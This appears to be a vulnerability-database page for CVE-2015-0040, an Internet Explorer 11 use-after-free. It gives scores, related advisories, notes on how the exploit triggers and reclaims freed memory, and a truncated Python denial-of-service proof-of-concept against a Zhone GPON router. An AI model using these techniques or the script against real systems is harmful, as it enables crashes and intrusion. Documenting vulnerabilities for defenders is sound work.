CVE-2015-0040
published 2015-02-11CVE-2015-0040: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka…
PriorityP261critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
30.04%
98.0th percentile
Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2015-0018, CVE-2015-0037, and CVE-2015-0066.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_explorer | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Exploit pattern involves creating a container element with children in the order: map, applet, map — then appending to the DOM document to trigger the vulnerable readystatechange interrupt sequence. ↗
- →After the use-after-free is triggered, freed CMapElement memory (size ~0x190 bytes per video element) is reclaimed by allocating and discarding video elements in a loop to force MemoryProtect to release the object; monitor for mass video element creation in IE11 JavaScript. ↗
- →Disabling JavaScript in Internet Explorer 11 prevents an attacker from triggering the vulnerable code path for CVE-2015-0040 / MS15-009. ↗
- ·The researcher was unable to prove full exploitability beyond reasonable doubt; the linked list corruption and use-after-free were demonstrated but a complete weaponized exploit chain was not confirmed. ↗
- ·Other CElement::Notify implementations for various element types may also be vulnerable to the same reentrancy issue, but were not exhaustively reverse-engineered. ↗
- ·The NVD source document is for CVE-2015-0066, not CVE-2015-0040; CVE-2015-0040 is only referenced as a related but distinct vulnerability in that entry. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-f77x-8486-m8vx: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web si
ghsa_unreviewed·2022-05-14·CVSS 9.3
CVE-2015-0066 [CRITICAL] GHSA-f77x-8486-m8vx: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web si
Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2015-0018, CVE-2015-0037, and CVE-2015-0040.
GHSA
GHSA-c5wh-gw3c-mrf3: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web si
ghsa_unreviewed·2022-05-14·CVSS 9.3
CVE-2015-0040 [CRITICAL] GHSA-c5wh-gw3c-mrf3: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web si
Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2015-0018, CVE-2015-0037, and CVE-2015-0066.
GHSA
GHSA-q2vh-mj5j-gf95: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web si
ghsa_unreviewed·2022-05-14·CVSS 9.3
CVE-2015-0037 [CRITICAL] GHSA-q2vh-mj5j-gf95: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web si
Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2015-0018, CVE-2015-0040, and CVE-2015-0066.
GHSA
GHSA-hpw3-wqfm-fjh6: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web si
ghsa_unreviewed·2022-05-14·CVSS 9.3
CVE-2015-0018 [CRITICAL] GHSA-hpw3-wqfm-fjh6: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web si
Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2015-0037, CVE-2015-0040, and CVE-2015-0066.
No detection rules found.
Exploit-DB
Microsoft Internet Explorer 11 - MSHTML CMapElement::Notify Use-After-Free (MS15-009)
exploitdb·2016-11-14
CVE-2015-0040 Microsoft Internet Explorer 11 - MSHTML CMapElement::Notify Use-After-Free (MS15-009)
Microsoft Internet Explorer 11 - MSHTML CMapElement::Notify Use-After-Free (MS15-009)
---
Element::Notify functions to make another such call and at least one of these functions is non-reentrant. This can have various repercussions, e.g. when an attacker triggers this vulnerability using a CMapElement object, a reference to that object can be stored in a linked list and the object itself can be freed. This pointer can later be re-used to cause a classic use-after-free issue.
Known affected versions, attack vectors and mitigations
Microsoft Internet Explorer 11
An attacker would need to get a target user to open a specially crafted web-page. Disabling JavaScript should prevent an attacker from triggering the vulnerable code path.
Description
When a DocumentFragment containing an
Exploit-DB
Zhone GPON 2520 R4.0.2.566b - Crash (PoC)
exploitdb·2015-01-21
CVE-2015-2055 Zhone GPON 2520 R4.0.2.566b - Crash (PoC)
Zhone GPON 2520 R4.0.2.566b - Crash (PoC)
---
from httplib2 import Http
from urllib import urlencode
import sys,time
#main function
if __name__ == "__main__":
if(len(sys.argv) != 2):
print '*********************************************************************************'
print ' GPON Zhone R4.0.2.566b D.O.S.'
print ' Tested on'
print ' GPON Zhone 2520'
print ' Hardware: 0040-48-02'
print ' Software: R4.0.2.566b'
print ' '
print ' Usage : python', sys.argv[0] + ' '
print ' Ex : python',sys.argv[0] + ' 192.168.15.1'
print ' Author : Kaczinski [email protected] '
print ' URL : http://www.websec.mx/advisories'
print '*********************************************************************************'
sys.exit()
HOST = sys.argv[1]
LIMIT = 100000
COUNT = 1
SIZE = 10
BUFFER = ''
while len(BUF
http://blog.skylined.nl/20161114001.htmlhttp://www.securityfocus.com/archive/1/539752/100/0/threadedhttp://www.securityfocus.com/bid/72410http://www.securitytracker.com/id/1031723https://docs.microsoft.com/en-us/security-updates/securitybulletins/2015/ms15-009https://www.exploit-db.com/exploits/40757/http://blog.skylined.nl/20161114001.htmlhttp://www.securityfocus.com/archive/1/539752/100/0/threadedhttp://www.securityfocus.com/bid/72410http://www.securitytracker.com/id/1031723https://docs.microsoft.com/en-us/security-updates/securitybulletins/2015/ms15-009https://www.exploit-db.com/exploits/40757/
2015-02-11
Published